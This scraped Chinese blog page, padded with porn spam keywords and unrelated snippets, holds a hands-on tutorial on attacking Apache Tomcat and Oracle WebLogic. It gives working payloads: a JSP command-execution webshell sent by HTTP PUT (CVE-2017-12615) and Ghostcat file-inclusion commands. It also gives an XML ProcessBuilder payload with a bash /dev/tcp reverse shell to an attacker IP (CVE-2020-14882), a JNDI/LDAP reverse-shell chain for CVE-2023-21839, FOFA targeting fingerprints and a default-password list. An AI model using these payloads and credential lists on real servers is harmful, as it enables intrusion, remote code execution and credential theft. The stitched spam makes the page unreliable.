97色伦色在线综合视频,无玛专区,18videosex性欧美黑色,日韩黄色电影免费在线观看,国产精品伦理一区二区三区,在线视频欧美日韩,亚洲欧美在线中文字幕不卡

網(wǎng)店交易平臺網(wǎng)站建設(shè)企業(yè)推廣計劃

鶴壁市浩天電氣有限公司 2026/01/24 11:13:10
網(wǎng)店交易平臺網(wǎng)站建設(shè),企業(yè)推廣計劃,品牌網(wǎng)站建設(shè)保障大蝌蚪,軟件公司介紹1、Tomcat#xff1a;貓咪雖可愛#xff0c;安全要牢記#xff01; 弱口令#xff1a;一不小心#xff0c;后門大開 影響版本#xff1a;所有版本都得注意#xff0c;安全無小事#xff01; 漏洞復(fù)現(xiàn)#xff1a;還在用弱口令#xff1f;黑客笑了#xff01;用哥斯…1、Tomcat貓咪雖可愛安全要牢記弱口令一不小心后門大開影響版本所有版本都得注意安全無小事漏洞復(fù)現(xiàn)還在用弱口令黑客笑了用哥斯拉或者你喜歡的任何木馬生成器生成一個木馬分分鐘上傳getshell。遇到彈窗點【取消】就對了別慌頁面提示很明顯了去 Tomcat 的 conf 目錄下找到 tomcat-users.xml 文件??催@里紅色框框里的代碼紅框1是你的密碼如果你設(shè)置了的話沒設(shè)置就像紅框2一樣空空如也。username 是賬戶password 是密碼記住了嗎接下來用你最愛的姿勢哥斯拉生成木馬。得到 ws.jsp 木馬文件先壓縮成 ws.zip再壓縮成 ws.war上傳訪問一下看看是不是上傳成功了。/ws 解壓后是 ws.jsp所以訪問 ws/ws.jsp。哥斯拉成功連上接下來就是你的表演時間了文件包含漏洞(CVE-2020-1938)Ghostcat 幽靈貓防不勝防漏洞描述Tomcat 默認(rèn)開啟的 AJP 連接器本意是方便和其他 Web 服務(wù)器交互結(jié)果卻成了黑客的突破口。通過惡意 AJP 請求黑客可以讀取甚至包含 Web 應(yīng)用根目錄下的任意文件。如果再配合文件上傳漏洞上傳個任意格式的文件就能直接 RCE (Remote Code Execution) 了記住只有開啟 AJP 服務(wù)且對外暴露時才受此漏洞影響Tomcat 默認(rèn)開啟 AJP 并綁定到 0.0.0.0/0。影響范圍Apache Tomcat 9.x 9.0.31 Apache Tomcat 8.x 8.5.51 Apache Tomcat 7.x 7.0.100 Apache Tomcat 6.x前提條件Tomcat 開啟了 AJP Connector并且黑客能訪問 AJP Connector 服務(wù)端口 (默認(rèn) 8009)。漏洞原理Tomcat 有兩個 ConnectorHTTP (默認(rèn) 8080) 和 AJP (默認(rèn) 8009)。AJP 比 HTTP 更優(yōu)化常用于反向代理、集群等場景。這個漏洞就是因為 Tomcat AJP 協(xié)議的缺陷讓黑客可以通過構(gòu)造特定參數(shù)讀取 Webapps 下的任意文件甚至包含任意文件。如果再配合文件上傳點上傳圖片馬就能 get shell 了漏洞危害黑客可以讀取 Tomcat 所有 Webapp 目錄下的任意文件包括配置文件、源代碼等敏感信息。更可怕的是如果你的網(wǎng)站有文件上傳功能黑客可以先上傳一個包含惡意 JSP 腳本的文件可以是任意類型的文件比如圖片然后利用 Ghostcat 漏洞包含這個文件直接執(zhí)行代碼漏洞復(fù)現(xiàn)1、下載有漏洞的 Tomcat 版本https://github.com/backlion/CVE-2020-1938/blob/master/apache-tomcat-8.5.32.zip2、安裝 JDK配置環(huán)境變量不會的自行 Google。3、啟動 Tomcat運(yùn)行 Tomcat 目錄 /bin 文件夾下的 startup.bat。任意文件讀取讀取 Webapps 目錄下的任何文件比如 WEB-INF/web.xmlpython CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.9 -p 8009 -f WEB-INF/web.xml任意文件包含1、先上傳一個包含惡意代碼的文件到 Webapps 目錄比如 test.txttest.txt% out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(whoami).getInputStream())).readLine()); %2、訪問這個文件確保它能被訪問到。3、執(zhí)行命令python3 cve-2020-10487-v1.py 192.168.1.9 -p 8009 -f exec.txt --rce 1文件上傳漏洞(CVE-2017-12615)PUT 方法惹的禍漏洞原理如果 Tomcat 運(yùn)行在 Windows 上并且啟用了 HTTP PUT 請求方法黑客就可以構(gòu)造請求上傳包含任意代碼的 JSP 文件然后服務(wù)器就會執(zhí)行這些代碼影響范圍Tomcat 7.0.0 - 7.0.81漏洞描述這個漏洞是因為 Tomcat 默認(rèn)配置中readonly參數(shù)被設(shè)置為false。漏洞復(fù)現(xiàn)用 Vulhub 搭建靶場一鍵搞定可以看到readonly值為false。發(fā)送 PUT 請求PUT /1.jsp/ HTTP/1.1 Host: your-ip:8080 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 5 % java.io.InputStream is Runtime.getRuntime() .exec(request.getParameter(command)) .getInputStream(); int a -1; byte[] b new byte[2048]; while ((a is.read(b)) ! -1) { out.print(new String(b)); } %訪問上傳的 JSP 文件執(zhí)行任意命令2、Weblogic不只是個服務(wù)器還是個高危漏洞集散地任意文件讀取漏洞想看啥就看啥就問你怕不怕漏洞原理通過 URL 就能讀取服務(wù)器上的任意文件比如/hello/file.jsp?path/etc/passwd。影響范圍Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3漏洞復(fù)現(xiàn)通過/etc/passwd讀取用戶信息http://xxx:7001/hello/file.jsp?path/etc/passwd1、讀取密文文件先讀取配置文件拿到加密密鑰/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml2、讀取加密后的密碼用 Burp Suite 抓包把密碼保存為 .dat 文件/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat把讀取的文件內(nèi)容保存成文件。3、解密用這個工具h(yuǎn)ttps://github.com/TideSec/Decrypt_Weblogic_Password遠(yuǎn)程命令執(zhí)行漏洞(CVE-2020-14882/14883)不登錄也能為所欲為漏洞原理CVE-2020-14883 允許未授權(quán)用戶接管 WebLogic Server ConsoleCVE-2020-14882 允許在 Console 上執(zhí)行任意代碼。組合起來黑客可以通過一個 GET 請求在遠(yuǎn)程 WebLogic 服務(wù)器上以任意用戶身份執(zhí)行命令影響范圍WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1.0.0漏洞復(fù)現(xiàn)構(gòu)造 XML 文件?xml version1.0 encodingUTF-8 ? beans xmlnshttp://www.springframework.org/schema/beans xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xsi:schemaLocationhttp://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd bean idpb classjava.lang.ProcessBuilder init-methodstart constructor-arg list valuebash/value value-c/value value![CDATA[touch /tmp/success]]/value /list /constructor-arg /bean /beans訪問這個 XML 文件服務(wù)器會在 /tmp 目錄下生成 success 文件。同理修改 XML 文件中的![CDATA[touch /tmp/success]]為![CDATA[bash -i /dev/tcp/攻擊機(jī)IP/4444 01]]即可反彈 shell未授權(quán)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-21839)T3/IIOP 協(xié)議的噩夢漏洞原理WebLogic 的 IIOP/T3 協(xié)議存在缺陷允許未授權(quán)的攻擊者通過 IIOP/T3 協(xié)議網(wǎng)絡(luò)訪問存在安全風(fēng)險的 WebLogic Server。利用成功后黑客可以接管 WebLogic Server執(zhí)行任意命令導(dǎo)致服務(wù)器淪陷或敏感數(shù)據(jù)泄露。影響范圍12.2.1.2.0 12.2.1.1.0 12.2.1.3.0 12.2.1.0.0 12.2.1.4.0 14.1.1.0.0 12.1.2.0.0 12.1.3.0.0 10.3.6.0FOFA 指紋appBEA-WebLogic-Server || appWeblogic_interface_7001Vulfocus 已經(jīng)集成了該漏洞環(huán)境docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.1.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.3.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.4.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:14.1.1.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.2.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.3.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:10.3.6.0-jdk-release漏洞環(huán)境使用 Vulhub 搭建。漏洞復(fù)現(xiàn)下載 JNDIExploithttps://github.com/WhiteHSBG/JNDIExploit1、搭建 LDAP 服務(wù)java -jar JNDIExploit-1.2-SNAPSHOT.jar -i kali的ip2、Kali 開啟 NC 監(jiān)聽nc -lvvp 99993、下載 EXPhttps://github.com/DXask88MA/Weblogic-CVE-2023-21839執(zhí)行命令java -jar Weblogic-CVE-2023-21839.jar 靶場 IP:7001 ldap://ldap服務(wù)器IP:1389/Basic/ReverseShell/ldap服務(wù)器IP/nc監(jiān)聽端口4、成功反彈 shell監(jiān)聽成功Weblogic 常用弱口令趕緊去測測你的 Weblogic 是不是裸奔weblogic/Oracle123 system/password weblogic/weblogic admin/security joe/password mary/password system/security wlcsystem/wlcsystem wlpisystem/wlpisystem weblogic/weblogic123 weblogic/weblogic2 system/password weblogic/weblogic admin/security joe/password mary/password system/security wlcsystem/wlcsystem wlpisystem/wlpisystem guest/guest portaladmin/portaladmin system/system WebLogic/WebLogic ## 學(xué)習(xí)資源 如果你是也準(zhǔn)備轉(zhuǎn)行學(xué)習(xí)網(wǎng)絡(luò)安全黑客或者正在學(xué)習(xí)這里開源一份360智榜樣學(xué)習(xí)中心獨家出品《網(wǎng)絡(luò)攻防知識庫》,希望能夠幫助到你 知識庫由360智榜樣學(xué)習(xí)中心獨家打造出品旨在幫助網(wǎng)絡(luò)安全從業(yè)者或興趣愛好者零基礎(chǔ)快速入門提升實戰(zhàn)能力熟練掌握基礎(chǔ)攻防到深度對抗。 #### 1、知識庫價值 深度 本知識庫超越常規(guī)工具手冊深入剖析攻擊技術(shù)的底層原理與高級防御策略并對業(yè)內(nèi)挑戰(zhàn)巨大的APT攻擊鏈分析、隱蔽信道建立等提供了獨到的技術(shù)視角和實戰(zhàn)驗證過的對抗方案。 廣度 面向企業(yè)安全建設(shè)的核心場景滲透測試、紅藍(lán)對抗、威脅狩獵、應(yīng)急響應(yīng)、安全運(yùn)營本知識庫覆蓋了從攻擊發(fā)起、路徑突破、權(quán)限維持、橫向移動到防御檢測、響應(yīng)處置、溯源反制的全生命周期關(guān)鍵節(jié)點是應(yīng)對復(fù)雜攻防挑戰(zhàn)的實用指南。 實戰(zhàn)性 知識庫內(nèi)容源于真實攻防對抗和大型演練實踐通過詳盡的攻擊復(fù)現(xiàn)案例、防御配置實例、自動化腳本代碼來傳遞核心思路與落地方法。 #### 2、 部分核心內(nèi)容展示 360智榜樣學(xué)習(xí)中心獨家《網(wǎng)絡(luò)攻防知識庫》采用由淺入深、攻防結(jié)合的講述方式既夯實基礎(chǔ)技能更深入高階對抗技術(shù)。 ![在這里插入圖片描述](https://i-blog.csdnimg.cn/direct/05423dde4c234794931dc82087f5cfb9.png#pic_center) 360智榜樣學(xué)習(xí)中心獨家《網(wǎng)絡(luò)攻防知識庫》采用**由淺入深、攻防結(jié)合**的講述方式既夯實基礎(chǔ)技能更深入高階對抗技術(shù)。 內(nèi)容組織緊密結(jié)合攻防場景輔以大量**真實環(huán)境復(fù)現(xiàn)案例、自動化工具腳本及配置解析**。通過**策略講解、原理剖析、實戰(zhàn)演示**相結(jié)合是你學(xué)習(xí)過程中好幫手。 **1、網(wǎng)絡(luò)安全意識** ![img](https://i-blog.csdnimg.cn/img_convert/fa8c915f2e45a7b28b1ca657bff8e748.png) **2、Linux操作系統(tǒng)** ![img](https://i-blog.csdnimg.cn/img_convert/e95958fb0c3198ec99731b01beda0f18.png) **3、WEB架構(gòu)基礎(chǔ)與HTTP協(xié)議** ![img](https://i-blog.csdnimg.cn/img_convert/8ee2ef75a3d8f28938218a4bc63ee9a1.png) **4、Web滲透測試** ![img](https://i-blog.csdnimg.cn/img_convert/e64c8548227cf570bebcbed7d3a17028.png) **5、滲透測試案例分享** ![img](https://i-blog.csdnimg.cn/img_convert/950b97c5d1707fef125219f8c317e556.png) **6、滲透測試實戰(zhàn)技巧** ![圖片](https://i-blog.csdnimg.cn/img_convert/c10e42351697065bf12409917ce2fffa.png) **7、攻防對戰(zhàn)實戰(zhàn)** ![圖片](https://i-blog.csdnimg.cn/img_convert/73d9f4bf46ce2d616e38a454c9bd2092.png) **8、CTF之MISC實戰(zhàn)講解** ![圖片](https://i-blog.csdnimg.cn/img_convert/7436339f38ec5dcb69107505b93e5b99.png) ## 3、適合學(xué)習(xí)的人群 ?**一、基礎(chǔ)適配人群**? 1. ?**零基礎(chǔ)轉(zhuǎn)型者**?適合計算機(jī)零基礎(chǔ)但愿意系統(tǒng)學(xué)習(xí)的人群資料覆蓋從網(wǎng)絡(luò)協(xié)議、操作系統(tǒng)到滲透測試的完整知識鏈? 2. ?**開發(fā)/運(yùn)維人員**?具備編程或運(yùn)維基礎(chǔ)者可通過資料快速掌握安全防護(hù)與漏洞修復(fù)技能實現(xiàn)職業(yè)方向拓展?或者轉(zhuǎn)行就業(yè) 3. ?**應(yīng)屆畢業(yè)生**?計算機(jī)相關(guān)專業(yè)學(xué)生可通過資料構(gòu)建完整的網(wǎng)絡(luò)安全知識體系縮短企業(yè)用人適應(yīng)期? ?**二、能力提升適配**? 1、?**技術(shù)愛好者**?適合對攻防技術(shù)有強(qiáng)烈興趣希望掌握漏洞挖掘、滲透測試等實戰(zhàn)技能的學(xué)習(xí)者? 2、**安全從業(yè)者**?幫助初級安全工程師系統(tǒng)化提升Web安全、逆向工程等專項能力? 3、?**合規(guī)需求者**?包含等保規(guī)范、安全策略制定等內(nèi)容適合需要應(yīng)對合規(guī)審計的企業(yè)人員? 因篇幅有限僅展示部分資料完整版的網(wǎng)絡(luò)安全學(xué)習(xí)資料已經(jīng)上傳CSDN朋友們?nèi)绻枰梢栽谙路紺SDN官方認(rèn)證二維碼免費(fèi)領(lǐng)取【保證100%免費(fèi)】 ![在這里插入圖片描述](https://i-blog.csdnimg.cn/direct/2d7b7474227341e59069a6e903663246.jpeg#pic_center)
版權(quán)聲明: 本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請聯(lián)系我們進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

怎么接網(wǎng)站建設(shè)的單子做新網(wǎng)站的swot分析

怎么接網(wǎng)站建設(shè)的單子,做新網(wǎng)站的swot分析,軟件企業(yè)官網(wǎng),手機(jī)網(wǎng)站和app有什么區(qū)別Sonic 數(shù)字人視頻生成技術(shù)解析#xff1a;從語音驅(qū)動到自動導(dǎo)出的全流程實現(xiàn) 在短視頻內(nèi)容爆炸式增長的今天#x

2026/01/21 15:43:01

創(chuàng)建網(wǎng)站商城什么網(wǎng)站流量大

創(chuàng)建網(wǎng)站商城,什么網(wǎng)站流量大,大連專業(yè)制作網(wǎng)站,網(wǎng)站建設(shè)進(jìn)程表論文AIGC率過高是當(dāng)前很多學(xué)生和研究者在論文寫作中遇到的普遍問題。別慌#xff0c;只要掌握正確的方法#xff0c;完全可以將AI生成痕

2026/01/23 06:24:01

做地方網(wǎng)站論壇游戲網(wǎng)站開發(fā)畢業(yè)設(shè)計

做地方網(wǎng)站論壇,游戲網(wǎng)站開發(fā)畢業(yè)設(shè)計,wordpress鏈接默認(rèn)是什么樣子,網(wǎng)站如何買空間在當(dāng)今健身科技飛速發(fā)展的時代#xff0c;運(yùn)動數(shù)據(jù)分析已成為提升訓(xùn)練效果的關(guān)鍵環(huán)節(jié)。Python Fitpar

2026/01/22 22:24:02